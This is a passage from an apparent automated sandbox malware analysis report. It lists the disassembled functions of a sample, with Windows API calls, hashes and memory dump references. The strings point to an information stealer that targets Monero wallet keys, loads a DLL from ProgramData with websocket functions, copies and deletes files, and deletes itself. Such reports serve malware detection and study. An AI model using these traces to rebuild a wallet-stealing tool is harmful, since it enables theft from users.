                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 9c256dd698c8d4c331c84d2edc313c09e3a84a5f6da968ce8e799620f9558a31
                            • Instruction ID: f5abce995d3228f20c5542760bcb41ba38f54421c9522c280a7609a860ab5ca4
                            • Opcode Fuzzy Hash: 9c256dd698c8d4c331c84d2edc313c09e3a84a5f6da968ce8e799620f9558a31
                            • Instruction Fuzzy Hash: 4841F97010479C5EDB318B248C95FFBBBF89B45709F245CE8DD8AA7142E2719A48DF60
                            Function 00E568D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E56903
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E569C6
                            • ExitProcess.KERNEL32 ref: 00E569F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: dc78af6d311998419bdc9be0239f8365c2fa9da11e6dca2af3e89447bd2ac17a
                            • Instruction ID: ba37904d06fe07663b1d9343309d991c760be3e2d4932db977526f46e766b0ef
                            • Opcode Fuzzy Hash: dc78af6d311998419bdc9be0239f8365c2fa9da11e6dca2af3e89447bd2ac17a
                            • Instruction Fuzzy Hash: 993150B1901218ABDB58EB90DD91FDEB7B8AF08301F4055A8F61676181DF706B8CCF55
                            Function 00E58950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E10,00000000,?), ref: 00E589BF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E589C6
                            • wsprintfA.USER32 ref: 00E589E0
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 66ac92a73f61cfca2b871580246b53fda0d7c046357c7a5ff88a4bee36cee4b4
                            • Instruction ID: 99f0b93b7a1532b57285692400780a06ce7369a05e3050689f84c3dfd2feae32
                            • Opcode Fuzzy Hash: 66ac92a73f61cfca2b871580246b53fda0d7c046357c7a5ff88a4bee36cee4b4
                            • Instruction Fuzzy Hash: FB214AB1A44208AFDB14DF94DE49FAEBBB8FB48701F104529FA15A73C4C775A9408BA0
                            Function 00E4A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E4A098
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                            • API String ID: 1029625771-1545816527
                            • Opcode ID: 319d465c72052551ba5d1a6eb4364a70bc01651474ceba79fd7d86122bd8169c
                            • Instruction ID: 167dce41307fe2f1772a5bc956b17d8cf83012250182ba497557259576d3a661
                            • Opcode Fuzzy Hash: 319d465c72052551ba5d1a6eb4364a70bc01651474ceba79fd7d86122bd8169c
                            • Instruction Fuzzy Hash: A9F090786C9300AFC729AB60FA08BA6B2A4E347354F042574F025A73C8D7B449C4CB22
                            Function 00E58EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E596AE,00000000), ref: 00E58EEB
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E58EF2
                            • wsprintfW.USER32 ref: 00E58F08
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 4d1b87c6e2e5d1a22c634e3b64f7839ffe3bb6333ebfde472768ee432d67376c
                            • Instruction ID: 27a0d7a7beea3391bac9b1cd7d6a6f550151c350c9687db322f88bd47edd5bb5
                            • Opcode Fuzzy Hash: 4d1b87c6e2e5d1a22c634e3b64f7839ffe3bb6333ebfde472768ee432d67376c
                            • Instruction Fuzzy Hash: D8E0EC75A84309BBDB28DBD4EE0AEADB7B8EB45701F0001A4FD0997380DA719E509B91
                            Function 00E4A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4AA11
                            • lstrlen.KERNEL32(00000000,00000000), ref: 00E4AB2F
                            • lstrlen.KERNEL32(00000000), ref: 00E4ADEC
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4AE73
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a2ac0260e1629efbc8823c718b1623ca8d61b81683c0dd4c45f699a70b8f3c73
                            • Instruction ID: 6209ce1b478a248da2c710527a88a4e0921f8fec004f7ccdbfd4f038e1025b94
                            • Opcode Fuzzy Hash: a2ac0260e1629efbc8823c718b1623ca8d61b81683c0dd4c45f699a70b8f3c73
                            • Instruction Fuzzy Hash: FFE116729101089BCB54FBA4DDA2EEEB37DAF14301F449A79F51672191EF306A4CCBA1
                            Function 00E4D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D581
                            • lstrlen.KERNEL32(00000000), ref: 00E4D798
                            • lstrlen.KERNEL32(00000000), ref: 00E4D7AC
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4D82B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 03670283e105eec6a1c37f4b1548a51df0c1856bf54a3d4c2ff23c583a8ed825
                            • Instruction ID: 42126f06ba2ff22e8f431e0289984ed1b5ced58f1d7520b3dd66291a1d15590a
                            • Opcode Fuzzy Hash: 03670283e105eec6a1c37f4b1548a51df0c1856bf54a3d4c2ff23c583a8ed825
                            • Instruction Fuzzy Hash: DB9107729101089BCB18FBA4DD62DEEB379AF14301F545A79F91772191EF306A4CCBA2
                            Function 00E4D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D901
                            • lstrlen.KERNEL32(00000000), ref: 00E4DA9F
                            • lstrlen.KERNEL32(00000000), ref: 00E4DAB3
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4DB32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 74fd524ee65cd34bccfaad4adac1fdd19793b0eba6ac74a4a06b2a5934fc5ec2
                            • Instruction ID: 5b5cc2d1427f9406564d83b14cc849791489911b77311df31ee8723f6ccadba8
                            • Opcode Fuzzy Hash: 74fd524ee65cd34bccfaad4adac1fdd19793b0eba6ac74a4a06b2a5934fc5ec2
                            • Instruction Fuzzy Hash: 2A8116729101089BCF14FBA4DDA6DEEB379AF14301F445A79F91672191EF306A4CCBA2
                            Function 00EBFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction ID: 7da9ecb5b7c1fd74cd4906d2d81ac0354529694b38d4d991c6d3f4d81a44a7a0
                            • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                            • Instruction Fuzzy Hash: EB51DC72600202EFEB298F14CD42BFBB3A5EF01308F24652DE815A6691E732ED41DB90
                            Function 00E4A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E4A664
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
